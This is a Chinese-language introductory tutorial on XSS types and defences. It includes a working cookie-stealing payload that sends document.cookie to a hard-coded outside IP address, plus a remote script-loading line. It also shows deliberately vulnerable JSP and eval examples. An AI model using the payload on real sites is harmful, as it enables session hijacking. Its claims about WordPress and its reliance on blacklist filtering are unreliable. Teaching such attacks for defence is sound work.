XSS入门

• XSS(cross site script跨域脚本)

官方解释
通常指黑客通过html注入,篡改网页,插入恶意脚本,从而在用户浏览网页时,控制浏览器的一种手段

个人理解
xss是指黑客通过构建url的参数或者通过输入框等向服务器输入恶意js脚本,然后再通过服务器输出含有恶意脚本的网页,使浏览了这些网页的网民可能会被黑客控制,比如黑客可以获取他们的cookie及其其他重要信息,或者黑客可以不断弹出恶意弹出框,骚扰用户..xss的重点在于我们如何把输入(恶意脚本)通过网页的漏洞,然后嵌套到网页中,使原本没有这段恶意脚本的网页有这段脚本.

• 类型

持久性
是指黑客的恶意脚本已经被存储到服务器里,只要有用户浏览相关网页,就会中招.比如黑客把某段攫取用户cookie的恶意脚本写到某个帖子里面(比如 如何通过五年时间赚取人生的第一套房 ),刚好那个bbs网站又没有做xss处理,那么浏览这个网页的用户以为自己只是在看某个很普通的帖子,实际上他在这个网站的cookie已经被发到黑客自己的服务器上.然后黑客就可以通过这个用户cookie,登录这个bbs网站,然后进行一些非法操作.wordpress根本没做什么xss防御,很容易就被植入持久性xss.

反射型
是指黑客的恶意脚本没有存储到服务器上,一般黑客是把一个含有恶意脚本的url发给用户,诱导用户去点击,然后再攫取你的信息.比如,
服务器的JSP:

<body>
    <%=request.getParameter(“name”)%>
</body>

黑客给你的url:

http://localhost/test/test.jsp?name=<script>alert(1)</script>

这时会弹出

弹出框

这只是普通的弹出一个框,但是如果黑客在脚本里面写了攫取你的cookie的代码,那么你在localhsot这个网站的cookie就会被发送到黑客自己的服务器上面去..

你可能会觉得,谁会写像这个jsp这么弱智的代码,可是现实中确实是有不少输入参数打印到html的例子,比如搜索..

DOM型
不管是反射型xss还是持久化xss,他们都需要服务器把渲染好的含有恶意脚本的html返回给我们,然后我们才会中招,但是DOM型xss不需要经过服务器,比如
我们在script里面有这么一段代码

<script>
    eval(location.hash.substr(1));
</script>

PS:eval函数的作用是计算某个字符串,并执行里面的JavaScript代码.如果不是JavaScript代码会报错.

然后我们输入
http://localhost/test/test.jsp?name=huang#alert(1)
在这个例子中,xss的恶意代码#alert(1)没有经过服务器,但是由于JavaScript函数的漏洞,我们还是中招了.

• xss payload

是什么?

黑客用于xss攻击的完成某些具体功能的恶意脚本就叫做xss payload.

盗取cookie的脚本

<script>
    var img = document.createElement(“img”);
    var cookie = document.cookie;
    img.src = “http://139.199.168.61?cookie=”+cookie;
    document.body.append(img);
</script>

只要把这段xss payload通过持久化xss插入到某个网页中,那么浏览这个网页的所有人在这个网站的cookie都会被发到139.199.168.61的服务器上.这里有两个问题:

1. 如果输入框限制长度,这么长的脚本怎么办?我们可以把脚本写到某个文件中.比如
   <script src=”http://139.199.168.61/test.js”></script>

2. 为什么要构造一张图片,而不直接用ajax请求?
   由于同源策略,ajax是比较难去请求不同源的网站的;而构造图片,网站都会加载,一加载就会中招.

• 防御

1. httpOnly
   服务器种cookie的时候,加上HTTPOnly关键字,用document.cookie获取cookie的时候,就获取不到这部分的cookie了.

2. 对输入进行过滤
   前端 或者 后端 对 ”, <script>, eval, window, alert,javascript字段进行过滤然后再保存.比如我们想要保存 <script>alert(1)</script> ,过滤之后就只剩下保存alert(1)了

3. 对输出进行编码 :
   在html中,你输入< 和输入 < 得到的都是 < 的视觉效果, 我们可以对诸如 < ,>等字符进行编码,使其视觉效果看起来一样,但是已经构不成原来的标签了,这样就失去了攻击力.java里面HtmlUtils.htmlEscape()就是通过这个原理对输出进行编码.

< 转成 &lt;
> 转成 &gt;
& 转成 &amp;
” 转成 &quot;
‘ 转成 &#39
\ 转成 \\
/ 转成 \/
; 转成 ；(全角;)